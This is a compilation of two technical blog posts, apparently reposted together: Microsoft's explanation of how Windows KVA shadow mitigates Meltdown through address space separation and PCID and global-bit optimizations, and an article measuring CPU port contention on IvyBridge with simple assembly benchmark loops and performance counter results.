Based on the above design decisions, there is an additional set of tasks specific to KVA shadowing that must occur before the normal trap handling code in the kernel is invoked for a kernel entry trap event. In addition, there is a similar set of tasks related to KVA shadow that must occur at the end of trap processing, if a kernel exit is occurring. On normal kernel entry, the following sequence of events must occur: The kernel GS base value must be loaded. This enables the remaining trap code to access per-processor data structures, such as those that hold the kernel CR3 value for the current processor. The processor’s address space must be switched to the kernel address space, so that all kernel code and data are accessible (i.e., the kernel CR3 value must be loaded). This necessitates that the kernel CR3 value must be stored in a location that is, itself, shadowed. For the purposes of KVA shadow, a single per-processor KPRCB page that contains only “safe” contents maintains a copy of the current processor’s kernel CR3 value for easy access to the KVA shadow trap dispatch code.
Context switch between address spaces, and process attach/detach update the corresponding KPRCB fields with the new CR3 value on process address space changes. The machine frame previously pushed by hardware as a part of the ring transition from user mode to kernel mode must be copied from the current (transition) stack, to the per-kernel-thread stack for the current thread. The current stack must be switched to the per-kernel-thread stack. At this point, the “normal” trap handling code can largely proceed as usual, and without invasive modifications (save that the kernel GS base has already been loaded). Roughly speaking, the inverse sequence of events must occur on normal kernel exit; the machine frame at the top of the current kernel thread stack must be copied to the transition stack for the processor, the stacks must be switched, CR3 must be reloaded with the corresponding value for the user mode address space of the current process, the user mode GS base must be reloaded, and then control may be returned to user mode. System service call entry and exit through the SYSCALL/SYSRETQ instruction pair is handled slightly specially, in that the processor does not already push a machine frame, because the kernel logically does not have a current stack pointer until it explicitly loads one. In this case, no machine frame needs be copied on kernel entry and kernel exit, but the other basic steps must still be performed. Special care needs to be taken by the KVA shadow trap dispatch code for NMI, machine check, and double fault type trap events, because these events may interrupt even normally uninterruptable code. This means that they could even interrupt the normally uninterruptable KVA shadow trap dispatch code itself, during a kernel entry or kernel exit event. 
These types of traps are delivered using the IST mechanism onto their own distinct transition stacks, and the trap handling code must carefully handle the case of the GS base or CR3 value being in any state due to the indeterminate state of the machine at the time in which these events may occur, and must preserve the pre-existing GS base or CR3 values. At this point, the basics for how to enter and exit the kernel with KVA shadow are in place. However, it would be undesirable to inline the KVA shadow trap dispatch code into the standard trap entry and trap exit code paths, as the standard trap entry and trap exit code paths could be located anywhere in the kernel’s .text code section, and it is desirable to minimize the amount of code that needs be shadowed into the user address space. For this reason, the KVA shadow trap dispatch code is collected into a series of parallel entry points packed within their own code section within the kernel image, and either the standard set of trap entry points, or the KVA shadow trap entry points are installed into the IDT at system boot time, based on whether KVA shadow is in use at system boot. Similarly, the system service call entry points are also located in this special code section in the kernel image. Note that one implication of this design choice is that KVA shadow does not protect against attacks against kernel ASLR using speculative side channels. This is a deliberate decision given the design complexity of KVA shadow, timelines involved, and the realities of other side channel issues affecting the same processor designs. Notably, processors susceptible to rogue data cache load are also typically susceptible to other attacks on their BTBs (branch target buffers), and other microarchitectural resources that may allow kernel address space layout disclosure to a local attacker that is executing arbitrary native code. 
Memory management considerations for KVA shadow Now that KVA shadow is able to handle trap entry and trap exit, it’s necessary to understand the implications of KVA shadowing on memory management. As with the trap handling design considerations for KVA shadow, ensuring the correct security properties, providing good performance characteristics, and maximizing the maintainability of code changes were all important design goals. Where possible, rules were established to simplify the memory management design implementation. For example, all kernel allocations that are shadowed into the user mode address space are shadowed system-wide and not per-process or per-processor. As another example, all such shadowed allocations exist at the same kernel virtual address in both the user mode and kernel mode address spaces and share the same underlying physical pages in both address spaces, and all such allocations are considered nonpageable and are treated as though they have been locked into memory. The most apparent memory management consequence of KVA shadowing is that each process typically now needs a separate address space (i.e., page table hierarchy, or top level page directory page) allocated to describe the shadow user address space, and that the top level page directory entries corresponding to user mode VAs must be replicated from the process’s kernel address space top level page directory page to the process’s user address space top level page directory page. The top level page directory page entries for the kernel half of the VA space are not replicated, however, and instead only correspond to a minimal set of page table pages needed to map the small subset of pages that have been explicitly shadowed into the user mode address space. As noted above, pages that are shadowed into the user mode address space are left nonpageable for simplicity. 
In practice, this is not a substantial hardship for KVA shadow, as only a very small number of fixed allocations are ever shadowed system-wide. (Remember that only the per-processor transition stacks are shadowed, not any per-thread data structures, such as per-thread kernel stacks.) Memory management must then replicate any updates to top level user mode page directory page entries between the two process address spaces, as any updates occur, and access bit handling for working set aging and other purposes must logically OR the access bits from both user and kernel address spaces together if a top level page directory page entry is being considered (and, similarly, working set aging must clear access bits in both top level page directory page if a top level entry is being considered). Similarly, memory management must be aware of both address spaces that may exist for processes in various other edge-cases where top-level page directory pages are manipulated. Finally, no general purpose kernel allocations can be marked as “global” in their corresponding leaf page table entries by the kernel, because processors susceptible to rogue data cache load cannot observe any cached virtual address translations for any privileged kernel pages that could contain sensitive memory contents while in user mode, for KVA shadow protections to be effective, and such global entries would still be cached in the processor translation buffer (TB) across an address space switch. Booting is just the beginning of a journey At this point, we have covered some of the major areas involved in the kernel with respect to KVA shadow. 
However, there’s much more that’s involved beyond just trap handling and memory management: For example, changes to how Windows handles multiprocessor initialization, hibernate and resume, processor shutdown and reboot, and many other areas were all required in order to make KVA shadow into a fully featured solution that works correctly in all supported software configurations. Furthermore, preventing the rogue data cache load issue from exposing privileged kernel mode memory contents is just the beginning of turning KVA shadow into a feature that could be shipped to a diverse customer base. So far, we have only touched on the basics of the highlights of an unoptimized implementation of KVA shadow on x64 Windows. We’re far from done examining KVA shadowing, however; a substantial amount of additional work was still required in order to reduce the performance overhead of KVA shadow to the absolute minimum possible. As we’ll see, there are a number of options that have been considered and employed to that end with KVA shadow. The below optimizations are already included with the January 3rd, 2018 security updates to address rogue data cache load. Performance optimizations One of the primary challenges faced by the implementation of KVA shadow was maximizing system performance. The model of a unified, flat address space shared between user and kernel mode, with page permission bits to protect kernel-owned pages from access by unprivileged user mode code, is both convenient for an operating system kernel to implement, and easily amenable to high performance user/kernel transitions. The reason why the traditional, unified address space model allows for fast user/kernel transitions relates to how processors handle virtual memory. 
Processors typically cache previously fetched virtual address translations in a small internal cache that is termed a translation buffer, (or TB, for short); some literature also refers to these types of address translation caches as translation lookaside buffers (or TLBs for short). The processor TB operates on the principle of locality: if an application (or the kernel) has referenced a particular virtual address translation recently, it is likely to do so again, and the processor can save the costly process of re-walking the operating system’s page table hierarchy if the requisite translation is already cached in the processor TB. Traditionally, a TB contains information that is primarily local to a particular address space (or page table hierarchy), and when a switch to a different page table hierarchy occurs, such as with a context switch between threads in different processes, the processor TB must be flushed so that translations from one process are not improperly used in the context of a different process. This is critical, as two processes can, and frequently do, map the same user mode virtual address to completely different physical pages. KVA shadowing requires switching address spaces much more frequently than operating systems have traditionally done so, however; on processors susceptible to the rogue data cache load issue, it is now necessary to switch the address space on every user/kernel transition, which are vastly more frequent events than cross-process context switches. In the absence of any further optimizations, the fact that the processor TB is flushed and invalidated on each user/kernel transition would substantially reduce the benefit of the processor TB, and would represent a significant performance cost on the system. Fortunately, there are some techniques that the Windows KVA shadow implementation employs to substantially mitigate the performance costs of KVA shadowing on processor hardware that is susceptible to rogue data cache load. 
Optimizing KVA shadow for maximum performance presented a challenging exercise in finding creative ways to make use of existing, in-the-field hardware capabilities, sometimes outside the scope of their original intended use, while still maintaining system security and correct system operation, but several techniques have been developed to substantially reduce the cost.

PCID acceleration

The first optimization, the usage of PCID (process-context identifier) acceleration, is relevant to Intel Core-family processors of Haswell and newer microarchitectures. While the TB on many processors traditionally maintained information local to an address space, and had to be flushed on any address space switch, the PCID hardware capability allows address translations to be tagged with a logical PCID that informs the processor which address space they are relevant to. An address space (or page table hierarchy) can be tagged with a distinguished PCID value, and this tag is maintained with any non-global translations that are cached in the processor’s TB; then, on address space switch to an address space with a different associated PCID, the processor can be instructed to preserve the previous TB contents. Because the processor requires the current address space’s PCID to match that of any cached translation in the TB for the purposes of matching any translation lookups in the TB, address translations from multiple address spaces can now be safely represented concurrently in the processor TB. On hardware that is PCID-capable and which requires KVA shadowing, the Windows kernel employs two distinguished PCID values, which are internally termed PCID_KERNEL and PCID_USER. The kernel address space is tagged with PCID_KERNEL, and the user address space is tagged with PCID_USER, and on each user/kernel transition, the kernel will typically instruct the processor to preserve the TB contents when switching address spaces.
This enables the preservation of the entire TB contents on system service calls and other high frequency user/kernel transitions, and in many workloads, substantially mitigates almost all of the cost of KVA shadowing. Some duplication of TB entries between user and kernel mode is possible if the same user mode VA is referenced by user and kernel code, and additional processing is also required on some types of TB flushes, as certain types of TB flushes (such as those that invalidate user mode VAs) must be replicated to both user and kernel PCIDs. However, this overhead is typically relatively minor compared to the loss of all TB entries if the entire TB were not preserved on each user/kernel transition. On address space switches between processes, such as context switches between two different processes, the entire TB is invalidated. This must be performed because the PCID values assigned by the kernel are not process-specific, but are global to the entire system. Assigning different PCID values to each process (which would be a more “traditional” usage of PCID) would preclude the need to flush the entire TB on context switches between processes, but would also require TB flush IPIs (interprocessor-interrupts) to be sent to a potentially much larger set of processors, specifically being all of those that had previously loaded a given PCID, which in and of itself is a performance trade-off due to the cost involved in TB flush IPIs. It’s important to note that PCID acceleration also requires the hypervisor to expose CR4.PCID and the INVPCID instruction to the Windows kernel. The Hyper-V hypervisor was updated to expose these capabilities with the January 3rd, 2018 security updates. Additionally, the underlying PCID hardware capability is only defined for the native 64-bit paging mode, and thus a 64-bit kernel is required to take advantage of PCID acceleration (32-bit applications running under a 64-bit kernel can still benefit from the optimization). 
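The benefit of tagging translations with a PCID can be illustrated with a toy model. The sketch below is not how the Windows kernel or the hardware implements anything; the class `TaggedTB`, the function `run`, the page lists, and the numeric values chosen for `PCID_KERNEL` and `PCID_USER` are all hypothetical, picked only to show why preserving TB contents across user/kernel transitions avoids repeated page walks.

```python
# Toy model of a translation buffer (TB) whose entries are tagged with a PCID.
# All names and values below are illustrative assumptions, not kernel definitions.
PCID_USER = 1      # arbitrary value for this sketch
PCID_KERNEL = 2    # arbitrary value for this sketch


class TaggedTB:
    def __init__(self):
        self.entries = set()    # cached (pcid, virtual_page) pairs
        self.current_pcid = 0
        self.misses = 0         # each miss stands for one page table walk

    def switch_address_space(self, pcid, preserve):
        # preserve=False models a switch that invalidates cached translations;
        # preserve=True models a switch that keeps them.
        if not preserve:
            self.entries.clear()
        self.current_pcid = pcid

    def translate(self, vpage):
        key = (self.current_pcid, vpage)
        if key not in self.entries:
            self.misses += 1
            self.entries.add(key)


def run(preserve, round_trips=10):
    """Count TB misses over repeated user -> kernel -> user transitions."""
    user_pages = [0x10, 0x11, 0x12, 0x13]   # pages touched in user mode
    kernel_pages = [0x80, 0x81, 0x82]       # pages touched in kernel mode
    tb = TaggedTB()
    for _ in range(round_trips):
        tb.switch_address_space(PCID_USER, preserve)
        for page in user_pages:
            tb.translate(page)
        tb.switch_address_space(PCID_KERNEL, preserve)
        for page in kernel_pages:
            tb.translate(page)
    return tb.misses


print("misses with TB preserved:", run(preserve=True))
print("misses with TB flushed:  ", run(preserve=False))
```

In this model the preserved case pays for each translation once, while the flushed case pays for every translation again after every transition, which is the cost that PCID acceleration is meant to avoid.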
User/global acceleration Although many modern processors can take advantage of PCID acceleration, older Intel Core family processors, and current Intel Atom family processors do not provide hardware support for PCID and thus cannot take advantage of that PCID support to accelerate KVA shadowing. These processors do allow a more limited form of TB preservation across address space switches, however, in the form of the “global” page table entry bit. The global bit allows the operating system kernel to communicate to the processor that a given leaf translation is “global” to the entire system, and need not be invalidated on address space switches. (A special facility to invalidate all translations including global translations is provided by the processor, for cases when the operating system changes global memory translations. On x64 and x86 processors, this is accomplished by toggling the CR4.PGE control register bit.) Traditionally, the kernel would mark most kernel mode page translations as global, in order to indicate that these address translations can be preserved in the TB during cross-process address space switches while all non-global address translations are flushed from the TB. The kernel is then obligated to ensure that both incoming and outgoing address spaces provide consistent translations for any global translations in both address spaces, across a global-preserving address space switch, for correct system operation. This is a simple matter for the traditional use of kernel virtual address management, as most of the kernel address space is identical across all processes. The global bit, thus, elegantly allows most of the effective TB contents for kernel VAs to be preserved across context switches with minimal hardware and software complexity. In the context of KVA shadow, however, the global bit can be used for a completely different purpose than its original intention, for an optimization termed “user/global acceleration”. 
Instead of marking kernel pages as global, KVA shadow marks user pages as global, indicating to the processor that all pages in the user mode half of the address space are safe to preserve across address space switches. While an address space switch must still occur on each user/kernel transition, global translations are preserved in the TB, which preserves the user TB entries. As most applications primarily spend their time executing in user mode, this mode of operation preserves the portion of the TB that is most relevant to most applications. The TB contents for kernel virtual addresses are unavoidably lost on each address space switch when user/global acceleration is in use, and as with PCID acceleration, some TB flushes must be handled differently (and cross-process context switches require an entire TB flush), but preserving the user TB contents substantially cuts the cost of KVA shadowing over the more naïve approach of marking no translations as global. Privileged process acceleration The purpose of KVA shadowing is to protect sensitive kernel mode memory contents from disclosure to untrusted user mode applications. This is required for security purposes in order to maintain privilege separation between kernel mode and user mode. However, highly-privileged applications that have complete control over the system are typically trusted by the operating system for a variety of tasks, up to and including loading drivers, creating kernel memory dumps, and so on. These applications effectively already have the privileges required in order to access kernel memory, and so KVA shadowing is of minimal benefit for these applications. 
KVA shadow thus optimizes highly privileged applications (specifically, those that have a primary token which is a member of the BUILTIN\Administrators group, which includes LocalSystem, and processes that execute as a fully-elevated administrator account) by running these applications only with the KVA shadow “kernel” address space, which is very similar to how applications execute on processors that are not susceptible to rogue data cache load. These applications avoid most of the overhead of KVA shadowing, as no address space switch occurs on user/kernel transitions. Because these applications are fully trusted by the operating system, and already have (or could obtain) the capability to load drivers that could naturally access kernel memory, KVA shadowing is not required for fully-privileged applications. Optimizations are ongoing The introduction of KVA shadowing radically alters how the Windows kernel fields traps and exceptions from a processor, and significantly changes several key aspects of memory management. While several high-value optimizations have already been deployed with the initial release of operating system updates to integrate KVA shadow support, research into additional avenues of improvement and opportunities for performance tuning continues. KVA shadow represents a substantial departure from some existing operating system design paradigms, and with any such substantial shift in software design, exploring all possible optimizations and performance tuning opportunities is an ongoing effort. Driver and application compatibility A key consideration of KVA shadow was that existing applications and drivers must continue to work. Specifically, it would not have been acceptable to change the Windows ABI, or to invalidate how drivers work with user mode memory, in order to integrate KVA shadow support into the operating system. 
Applications and drivers that use supported and documented interfaces are highly compatible with KVA shadow, and no changes to how drivers access user mode memory through supported and documented means are necessary. For example, under a try/except block, it is still possible for a driver to use ProbeForRead to probe a user mode address for validity, and then to copy memory from that user mode virtual address (under try/except protection). Similarly, MDL mappings to/from user mode memory still function as before. A small number of drivers and applications did, however, encounter compatibility issues with KVA shadow. By and large, the majority of incompatible drivers and applications used substantially unsupported and undocumented means to interface with the operating system. For example, Microsoft encountered several software applications from multiple software vendors that assumed that the raw machine instructions in certain, non-exported Windows kernel functions would remain static or unchanged with software updates. Such approaches are highly fragile and are subject to breaking at even slight perturbations of the operating system kernel code. Operating system changes like KVA shadow, that necessitated a security update which changed how the operating system manages memory and trap and exception dispatching, underscore the fragility of depending on highly unsupported and undocumented mechanisms in drivers and applications. Microsoft strongly encourages developers to use supported and documented facilities in drivers and applications. Keeping customers secure and up to date is a shared commitment, and avoiding dependencies on unsupported and undocumented facilities and behaviors is critical to meeting the expectations that customers have with respect to keeping their systems secure. Conclusion Mitigating hardware vulnerabilities in software is an extremely challenging proposition, whether you are an operating system vendor, driver writer, or an application vendor. 
In the case of rogue data cache load and KVA shadow, the Windows kernel is able to provide a transparent and strong mitigation for drivers and applications, albeit at the cost of additional operating system complexity, and especially on older hardware, at some potential performance cost depending on the characteristics of a given workload. The breadth of changes required to implement KVA shadowing was substantial, and KVA shadow support easily represents one of the most intricate, complex, and wide-ranging security updates that Microsoft has ever shipped. Microsoft is committed to protecting our customers, and we will continue to work with our industry partners in order to address speculative execution side channel vulnerabilities.

Ken Johnson, Microsoft Security Response Center (MSRC)

Source: https://blogs.technet.microsoft.com/srd/2018/03/23/kva-shadow-mitigating-meltdown-on-windows/
  15. Understanding CPU port contention.

21 Mar 2018

I continue writing about the performance of processors, and today I want to show some examples of issues that can arise in the CPU backend. In particular, today’s topic is CPU port contention. Modern processors have multiple execution units. For example, in the SandyBridge family there are 6 execution ports:

Ports 0, 1, 5 are for arithmetic and logic operations (ALU).
Ports 2, 3 are for memory reads.
Port 4 is for memory writes.

Today I will try to stress this side of my IvyBridge CPU. I will show when port contention can take place, present easy-to-understand pipeline diagrams, and even try IACA. It will be very interesting, so keep on reading!

Disclaimer: I don’t want to describe every nuance of the IvyBridge architecture, but rather to show how port contention might look in practice.

Utilizing full capacity of the load instructions

My IvyBridge CPU has 2 ports for executing loads, meaning that we can schedule 2 loads at the same time. Let’s look at the first example, where I read one cache line (64 bytes) in portions of 4 bytes. So, we will have 16 reads of 4 bytes. I make the reads within one cache line in order to eliminate cache effects. I repeat this 1000 times:

max load capacity

    ; esi contains the beginning of the cache line
    ; edi contains number of iterations (1000)
    .loop:
    mov eax, DWORD [esi]
    mov eax, DWORD [esi + 4]
    mov eax, DWORD [esi + 8]
    mov eax, DWORD [esi + 12]
    mov eax, DWORD [esi + 16]
    mov eax, DWORD [esi + 20]
    mov eax, DWORD [esi + 24]
    mov eax, DWORD [esi + 28]
    mov eax, DWORD [esi + 32]
    mov eax, DWORD [esi + 36]
    mov eax, DWORD [esi + 40]
    mov eax, DWORD [esi + 44]
    mov eax, DWORD [esi + 48]
    mov eax, DWORD [esi + 52]
    mov eax, DWORD [esi + 56]
    mov eax, DWORD [esi + 60]
    dec edi
    jnz .loop

I think there will be no issue with loading values into the same eax register, because the CPU will use register renaming to resolve this write-after-write dependency.
Performance counters that I use

UOPS_DISPATCHED_PORT.PORT_X - Cycles when a uop is dispatched on port X.
UOPS_EXECUTED.STALL_CYCLES - Counts the number of cycles in which no uops were dispatched to be executed on this thread.
UOPS_EXECUTED.CYCLES_GE_X_UOP_EXEC - Cycles where at least X uops were executed per thread.

The full list of performance counters for IvyBridge can be found here.

Results

I did my experiments on an IvyBridge CPU using the uarch-bench tool.

    Benchmark            Cycles   UOPS.PORT2   UOPS.PORT3   UOPS.PORT5
    max load capacity    8.02     8.00         8.00         1.00

We can see that our 16 loads were scheduled equally between PORT2 and PORT3: each port takes 8 uops. PORT5 takes the macro-fused uop formed from the dec and jnz instructions. The same picture can be observed with the IACA tool (a good explanation of how to use IACA):

    Architecture - IVB
    Throughput Analysis Report
    --------------------------
    Block Throughput: 8.00 Cycles       Throughput Bottleneck: Backend. PORT2_AGU, Port2_DATA, PORT3_AGU, Port3_DATA

    Port Binding In Cycles Per Iteration:
    -------------------------------------------------------------------------
    |  Port  |  0   -  DV  |  1   |  2   -  D   |  3   -  D   |  4   |  5   |
    -------------------------------------------------------------------------
    | Cycles | 0.0    0.0  | 0.0  | 8.0    8.0  | 8.0    8.0  | 0.0  | 1.0  |
    -------------------------------------------------------------------------

    N - port number or number of cycles resource conflict caused delay, DV - Divider pipe (on port 0)
    D - Data fetch pipe (on ports 2 and 3), CP - on a critical path
    F - Macro Fusion with the previous instruction occurred

    | Num Of |              Ports pressure in cycles               |    |
    |  Uops  |  0  - DV  |  1  |  2  -  D  |  3  -  D  |  4  |  5  |    |
    ---------------------------------------------------------------------
    |   1    |           |     | 1.0   1.0 |           |     |     | CP | mov eax, dword ptr [rsp]
    |   1    |           |     |           | 1.0   1.0 |     |     | CP | mov eax, dword ptr [rsp+0x4]
    |   1    |           |     | 1.0   1.0 |           |     |     | CP | mov eax, dword ptr [rsp+0x8]
    |   1    |           |     |           | 1.0   1.0 |     |     | CP | mov eax, dword ptr [rsp+0xc]
    |   1    |           |     | 1.0   1.0 |           |     |     | CP | mov eax, dword ptr [rsp+0x10]
    |   1    |           |     |           | 1.0   1.0 |     |     | CP | mov eax, dword ptr [rsp+0x14]
    |   1    |           |     | 1.0   1.0 |           |     |     | CP | mov eax, dword ptr [rsp+0x18]
    |   1    |           |     |           | 1.0   1.0 |     |     | CP | mov eax, dword ptr [rsp+0x1c]
    |   1    |           |     | 1.0   1.0 |           |     |     | CP | mov eax, dword ptr [rsp+0x20]
    |   1    |           |     |           | 1.0   1.0 |     |     | CP | mov eax, dword ptr [rsp+0x24]
    |   1    |           |     | 1.0   1.0 |           |     |     | CP | mov eax, dword ptr [rsp+0x28]
    |   1    |           |     |           | 1.0   1.0 |     |     | CP | mov eax, dword ptr [rsp+0x2c]
    |   1    |           |     | 1.0   1.0 |           |     |     | CP | mov eax, dword ptr [rsp+0x30]
    |   1    |           |     |           | 1.0   1.0 |     |     | CP | mov eax, dword ptr [rsp+0x34]
    |   1    |           |     | 1.0   1.0 |           |     |     | CP | mov eax, dword ptr [rsp+0x38]
    |   1    |           |     |           | 1.0   1.0 |     |     | CP | mov eax, dword ptr [rsp+0x3c]
    |   1    |           |     |           |           |     | 1.0 |    | dec rdi
    |   0F   |           |     |           |           |     |     |    | jnz 0xffffffffffffffbe
    Total Num Of Uops: 17

Why do we have 8 cycles per iteration?

On modern x86 processors a load instruction takes at least 4 cycles to execute even when the data is in the L1 cache, although according to Agner’s instruction_tables.pdf it has a latency of 2 cycles. Even with a latency of 2 cycles we would have (16 [loads] * 2 [cycles]) / 2 [ports] = 16 cycles. According to this calculation we should see 16 cycles per iteration, but we are running at 8 cycles per iteration. Why does this happen?

Well, like most execution units, load units are also pipelined, meaning that we can start a second load while the first load is still in progress on the same port. Let’s draw a simplified pipeline diagram and see what’s going on.

This is a simplified MIPS-like pipeline diagram, where we usually have 5 pipeline stages:

F (fetch)
D (decode)
I (issue)
E (execute) or M (memory operation)
W (write back)

It is far from the real execution diagram of my CPU; however, I preserved some important constraints of the IvyBridge architecture (IVB):

The IVB front end fetches a 16B block of instructions in a 16B-aligned window in 1 cycle.
IVB has 4 decoders, each of which can decode instructions that consist of at least a single uop.
IVB has 2 pipelined units for doing load operations.
To simplify the diagrams, I assume a load operation takes 2 cycles; the M1 and M2 stages reflect that in the diagram.

I should note that I omitted one important constraint: instructions always retire in program order. My later diagrams break this rule (I simply forgot about it when I was making them).

Drawing diagrams like this usually helps me understand what is going on inside the processor and find different sorts of hazards.

Some explanations for this pipeline diagram:
In the first cycle we fetch 4 loads. We can’t fetch LOAD5, because it doesn’t fit in the same 16B-aligned window as the first 4 loads.
In the second cycle we are able to decode all 4 fetched instructions, because they are all single-uop instructions.
In the third cycle we are able to issue only the first 2 loads. One of them goes to PORT2, the other goes to PORT3. Notice that LOAD3 and LOAD4 are stalled (typically waiting in the Reservation Station).
Only in cycle #4 are we able to issue LOAD3 and LOAD4, because we know the M1 stages will be free to use in the next cycle.

Continuing this diagram further, we would see that in each cycle we are able to retire 2 loads. We have 16 loads, so that explains why it takes only 8 cycles per iteration.

I ran an additional experiment to check this theory. I collected some more performance counters:

Benchmark            Cycles   CYCLES_GE_3_UOP_EXEC   CYCLES_GE_2_UOP_EXEC   CYCLES_GE_1_UOP_EXEC
max load capacity    8.02     1.00                   8.00                   8.00

The results above show that in each of the 8 cycles it took to execute one iteration, at least 2 uops were issued (two loads per cycle), and in one cycle we were able to issue 3 uops (the last 2 loads + the dec-jnz pair). Conditional branches are executed on PORT5, so nothing prevents us from scheduling them in parallel with 2 loads.
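The pipelining argument above can be checked with a toy model. The sketch below is only an illustration in Python, not a simulation of a real IvyBridge core: it ignores the front end, the reservation station and in-order retirement, and the function names (`cycles_per_iteration`, `load_loop`) are made up for this example. It assumes each port accepts one new uop per cycle when pipelined, and stays busy for the whole latency when not.

```python
def cycles_per_iteration(loop_body, iterations=1000, pipelined=True):
    """Toy port model: returns the average number of cycles per loop iteration.

    loop_body is a list of (allowed_ports, latency) pairs, one per uop.
    A pipelined port accepts a new uop every cycle; a non-pipelined port
    stays busy for the full latency of the uop it is executing.
    """
    next_free = {}   # port -> first cycle in which it can accept a uop
    last_done = 0    # cycle in which the last result becomes available
    for _ in range(iterations):
        for allowed_ports, latency in loop_body:
            # Pick the port that frees up first (ties go to the first listed).
            port = min(allowed_ports, key=lambda p: next_free.get(p, 0))
            issue = next_free.get(port, 0)
            next_free[port] = issue + (1 if pipelined else latency)
            last_done = max(last_done, issue + latency)
    return last_done / iterations


def load_loop(load_latency):
    # 16 loads that may use PORT2 or PORT3, plus the fused dec/jnz on PORT5.
    return [((2, 3), load_latency)] * 16 + [((5,), 1)]


if __name__ == "__main__":
    for latency in (2, 4):
        print("latency", latency, "->", cycles_per_iteration(load_loop(latency)))
    print("non-pipelined ->", cycles_per_iteration(load_loop(2), pipelined=False))
```

In this model the pipelined case stays at roughly 8 cycles per iteration whether the assumed load latency is 2 or 4, while the non-pipelined case with latency 2 gives the 16 cycles of the naive calculation.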
What is even more interesting is that if we run the simulation assuming that a load instruction has a latency of 4 cycles, all the conclusions in this example remain valid, because throughput is what matters (as Travis mentioned in his comment). There will still be 2 load instructions retired each cycle, which means that our 16 loads (inside each iteration) will retire in 8 cycles.

Utilizing other available ports in parallel

In the example that I presented, I’m only utilizing PORT2 and PORT3, and partially PORT5. What does that mean? Well, it means that we can schedule instructions on other ports in parallel with the loads for free. Let’s try to write such an example.

After each pair of loads I added one bswap instruction. This instruction reverses the byte order of a register. It is very helpful for big-endian to little-endian conversion and vice versa. There is nothing special about this instruction; I chose it simply because it suits my experiments best. According to Agner’s instruction_tables.pdf, the bswap instruction on a 32-bit register executes on PORT1 and has a latency of 1 cycle.
max load capacity + 1 bswap

; esi contains the beginning of the cache line
; edi contains number of iterations (1000)
.loop:
mov eax, DWORD [esi]
mov eax, DWORD [esi + 4]
bswap ebx
mov eax, DWORD [esi + 8]
mov eax, DWORD [esi + 12]
bswap ebx
mov eax, DWORD [esi + 16]
mov eax, DWORD [esi + 20]
bswap ebx
mov eax, DWORD [esi + 24]
mov eax, DWORD [esi + 28]
bswap ebx
mov eax, DWORD [esi + 32]
mov eax, DWORD [esi + 36]
bswap ebx
mov eax, DWORD [esi + 40]
mov eax, DWORD [esi + 44]
bswap ebx
mov eax, DWORD [esi + 48]
mov eax, DWORD [esi + 52]
bswap ebx
mov eax, DWORD [esi + 56]
mov eax, DWORD [esi + 60]
bswap ebx
dec edi
jnz .loop

Here are the results for this experiment:

Benchmark                      Cycles   UOPS.PORT1   UOPS.PORT2   UOPS.PORT3   UOPS.PORT5
max load capacity + 1 bswap    8.03     8.00         8.01         8.01         1.00

The first observation is that we get 8 more bswap instructions for free (we are still running at 8 cycles per iteration), because they do not contend with the load instructions. Let’s look at the pipeline diagram for this case:

We can see that all the bswap instructions fit nicely into the pipeline, causing no hazards.

Overutilizing ports

Modern compilers will try to schedule instructions for a particular target architecture so as to fully utilize all execution ports. But what happens when we try to schedule too many instructions on one execution port? Let’s see.
I added one more bswap instruction after each pair of loads:

port 1 throughput bottleneck

; esi contains the beginning of the cache line
; edi contains number of iterations (1000)
.loop:
mov eax, DWORD [esi]
mov eax, DWORD [esi + 4]
bswap ebx
bswap ecx
mov eax, DWORD [esi + 8]
mov eax, DWORD [esi + 12]
bswap ebx
bswap ecx
mov eax, DWORD [esi + 16]
mov eax, DWORD [esi + 20]
bswap ebx
bswap ecx
mov eax, DWORD [esi + 24]
mov eax, DWORD [esi + 28]
bswap ebx
bswap ecx
mov eax, DWORD [esi + 32]
mov eax, DWORD [esi + 36]
bswap ebx
bswap ecx
mov eax, DWORD [esi + 40]
mov eax, DWORD [esi + 44]
bswap ebx
bswap ecx
mov eax, DWORD [esi + 48]
mov eax, DWORD [esi + 52]
bswap ebx
bswap ecx
mov eax, DWORD [esi + 56]
mov eax, DWORD [esi + 60]
bswap ebx
bswap ecx
dec edi
jnz .loop

When I measured this with the uarch-bench tool, here is what I got:

Benchmark                       Cycles   UOPS.PORT1   UOPS.PORT2   UOPS.PORT3   UOPS.PORT5
port 1 throughput bottleneck    16.00    16.00        8.01         8.01         1.00

To understand why we now run at 16 cycles per iteration, it’s best to look at the pipeline diagram again:

Now it’s clear that we have 16 bswap instructions and only one port that can handle this kind of instruction. So we can’t go faster than 16 cycles in this case, because the IVB processor executes them sequentially. Other architectures might have more ports that can handle bswap instructions, which may allow them to run faster.

By now I hope you understand what port contention is and how to reason about such issues. Know the limitations of your hardware!

Additional resources

More detailed information about the execution ports of your processor can be found in Agner’s microarchitecture.pdf and, for Intel processors, in Intel’s optimization manual.

All the assembly examples that I showed in this article are available on my github.

UPD 23.03.2018

Several people mentioned that load instructions can’t have a latency of 2 cycles on modern Intel architectures. Agner’s tables seem to be inaccurate there.

I will not redo the diagrams, as that would make them harder to understand and would shift the focus away from what I actually wanted to explain. Again, my goal was not to reconstruct how the pipeline diagram looks in reality, but rather to explain the notion of port contention. However, I fully accept the comment, and it should be mentioned.

Also, if we assume that a load instruction has a latency of 4 cycles in those examples, all the conclusions in the post remain valid, because throughput is what matters (as Travis mentioned in his comment). There will still be 2 load instructions retired per cycle.

Another important thing to mention is that hyperthreading helps utilize execution “slots”. See more details in the HackerNews comments.

Sursa: https://dendibakh.github.io/blog/2018/03/21/port-contention
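The three measurements reported in the article above (about 8, 8 and 16 cycles per iteration) are consistent with a simple per-port throughput bound: the busiest execution resource sets a floor on the iteration time. The Python sketch below is only a back-of-the-envelope check under that assumption. The resource names and the `port_bound` helper are invented for this example, and PORT2 and PORT3 are lumped together as one "load" resource with capacity 2.

```python
def port_bound(uop_counts, capacity):
    """Lower bound on cycles per iteration imposed by the busiest resource.

    uop_counts maps a resource name to the number of uops per iteration that
    need it; capacity maps it to how many such uops can start per cycle.
    """
    return max(count / capacity[name] for name, count in uop_counts.items())


# Assumed resources: the two load ports together, PORT1 (bswap), PORT5 (branch).
CAPACITY = {"load": 2, "p1": 1, "p5": 1}

# Uop mixes taken from the three loops in the article.
BENCHMARKS = {
    "max load capacity": {"load": 16, "p5": 1},
    "max load capacity + 1 bswap": {"load": 16, "p1": 8, "p5": 1},
    "port 1 throughput bottleneck": {"load": 16, "p1": 16, "p5": 1},
}

if __name__ == "__main__":
    for name, mix in BENCHMARKS.items():
        print(f"{name}: at least {port_bound(mix, CAPACITY):.0f} cycles per iteration")
```

The bound says nothing about latency or dependency chains; it only reflects how many uops compete for each port, which is the effect the article isolates.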
